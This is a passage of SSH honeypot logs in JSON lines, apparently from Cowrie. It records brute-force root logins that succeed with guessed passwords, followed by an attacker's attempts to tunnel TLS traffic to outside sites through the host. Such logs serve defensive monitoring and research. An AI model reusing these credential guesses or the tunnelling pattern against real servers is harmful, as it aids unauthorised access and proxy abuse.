92-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:34:05.705864Z","src_ip":"212.227.235.229","session":"469003027213"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:34:06.739128Z","src_ip":"212.227.235.229","session":"469003027213"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:06.994823Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:06.996053Z","src_ip":"212.227.235.229","session":"469003027213"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36304,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e2134ab4bc","protocol":"ssh","message":"New connection: 212.227.235.229:36304 (1.2.3.4:22) [session: 26e2134ab4bc]","sensor":"my-vps","timestamp":"2025-08-26T10:34:10.665102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T10:34:10.666287Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T10:34:10.772633Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:34:11.315642Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"108.129.19.169","dst_port":443,"src_ip":"212.227.235.229","src_port":43444,"message":"direct-tcp connection request to 108.129.19.169:443 from 127.0.0.1:43444","sensor":"my-vps","timestamp":"2025-08-26T10:34:12.860519Z","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"108.129.19.169","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1b\\xd1\\x14GW{\\xb4\\xc68\\xf6-\\x19\\x93\\xf7\\xc8\\xd4G\\xea\\xbd\\x9c/\\xd0S\\x9fi\\xe0Jx\\xf5\\xba{\\x85 \\xb6\\xbdX\\xa8\\x18\\xf4z_\\xb6\\xb6w\\x12\\xf7\\x1d\\xccV\\xf3\\x80s\\xbf1a5'\\xb8\\xba\\x08\\xa1^\\x7fA\\x10\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 g\\x18?\\xa0\\xd60n\\xb2;\\xff\\xa1\\xd8\\x0b\\xeb\\xbd\\xb6\\xc1oR\\x8b\\x91\\xb2\\x86\\xfd\\xb1\\xac\\xb2\\x01s\\x17\\xaan\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 108.129.19.169:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1b\\xd1\\x14GW{\\xb4\\xc68\\xf6-\\x19\\x93\\xf7\\xc8\\xd4G\\xea\\xbd\\x9c/\\xd0S\\x9fi\\xe0Jx\\xf5\\xba{\\x85 \\xb6\\xbdX\\xa8\\x18\\xf4z_\\xb6\\xb6w\\x12\\xf7\\x1d\\xccV\\xf3\\x80s\\xbf1a5'\\xb8\\xba\\x08\\xa1^\\x7fA\\x10\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 g\\x18?\\xa0\\xd60n\\xb2;\\xff\\xa1\\xd8\\x0b\\xeb\\xbd\\xb6\\xc1oR\\x8b\\x91\\xb2\\x86\\xfd\\xb1\\xac\\xb2\\x01s\\x17\\xaan\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T10:34:12.982248Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"212.227.235.229","src_port":44034,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:44034","sensor":"my-vps","timestamp":"2025-08-26T10:34:13.111910Z","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x01\\xcf{\\xe4\\tO\\xc2\\x00\\xffXA\\xe6\\xc9\\xb0\\xe3\\xe3\\xe7f\\x92\\xb90>\\xb4\\xaf\\xdf,\\xcdO\\xf8;7\\x94 GC\\x89\\x05\\xa9\\xac\\x8e \\x0c\\x01\\x04\\x90|@\\x13%\\x8c#0}u\\x9fQS\"\\x9e\\xb7Z\\xddXA\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x95\\x08\\xb2f\\xc6\\xaer(\\x19\\x9e;$-\\x06V\\x83o\\x7f\\xc1d\\x817\\xa6\\xaa\\xe9\\x8daN\\xae\\xd5f|\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x01\\xcf{\\xe4\\tO\\xc2\\x00\\xffXA\\xe6\\xc9\\xb0\\xe3\\xe3\\xe7f\\x92\\xb90>\\xb4\\xaf\\xdf,\\xcdO\\xf8;7\\x94 GC\\x89\\x05\\xa9\\xac\\x8e \\x0c\\x01\\x04\\x90|@\\x13%\\x8c#0}u\\x9fQS\"\\x9e\\xb7Z\\xddXA\\xa2\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x95\\x08\\xb2f\\xc6\\xaer(\\x19\\x9e;$-\\x06V\\x83o\\x7f\\xc1d\\x817\\xa6\\xaa\\xe9\\x8daN\\xae\\xd5f|\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T10:34:13.225742Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"212.227.235.229","src_port":44478,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:44478","sensor":"my-vps","timestamp":"2025-08-26T10:34:13.334446Z","session":"26e2134ab4bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc6\\x1eU[j2\\xb4\\xc4\\xf8\\xa4\\xc0T\\xba\\xc8\\x08\\xdb\\xf3\\x1fJg\\x19L\\xc9fs\\x84\\xb0\\xea#k\\x0c\\xc0 \\x03\\xe4k\\xf11\\xf3\\xc0\\x8c\\xd4\\x9eEgz\\x08\\xf4\\xa3\\x83\\x81H\\xc4\\xb2\\xfd\\xb7\\x9f:\\x92/\\xb6\\xdb\\xf2\\x87t\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x97r7!\\xb1\\xff@\\xbd\\r+\\x94\\xde\\xc8\\xe0\\x9d\\xb9\\x84A^\\xdf\\xb8\\xfe'\\x02\\xb8\\xda\\x98x\\x80\\x9eJJ\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc6\\x1eU[j2\\xb4\\xc4\\xf8\\xa4\\xc0T\\xba\\xc8\\x08\\xdb\\xf3\\x1fJg\\x19L\\xc9fs\\x84\\xb0\\xea#k\\x0c\\xc0 \\x03\\xe4k\\xf11\\xf3\\xc0\\x8c\\xd4\\x9eEgz\\x08\\xf4\\xa3\\x83\\x81H\\xc4\\xb2\\xfd\\xb7\\x9f:\\x92/\\xb6\\xdb\\xf2\\x87t\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x97r7!\\xb1\\xff@\\xbd\\r+\\x94\\xde\\xc8\\xe0\\x9d\\xb9\\x84A^\\xdf\\xb8\\xfe'\\x02\\xb8\\xda\\x98x\\x80\\x9eJJ\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T10:34:13.450015Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:13.558985Z","src_ip":"212.227.235.229","session":"26e2134ab4bc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":40682,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec9b2f882c94","protocol":"ssh","message":"New connection: 196.251.86.249:40682 (1.2.3.4:22) [session: ec9b2f882c94]","sensor":"my-vps","timestamp":"2025-08-26T10:34:38.099205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:34:38.653439Z","src_ip":"196.251.86.249","session":"ec9b2f882c94"}
